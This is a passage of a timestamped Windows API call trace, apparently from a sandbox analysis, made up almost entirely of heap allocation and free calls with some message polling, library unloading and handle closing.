0x34aa5b0 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.240] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.240] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.240] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.241] FreeLibrary (hLibModule=0x74d40000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0188.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0188.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.243] CloseHandle (hObject=0x2ac) returned 1 [0188.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0188.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.247] CloseHandle (hObject=0x2c0) returned 1 [0188.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.249] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0188.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0188.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0188.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0188.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.255] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.256] 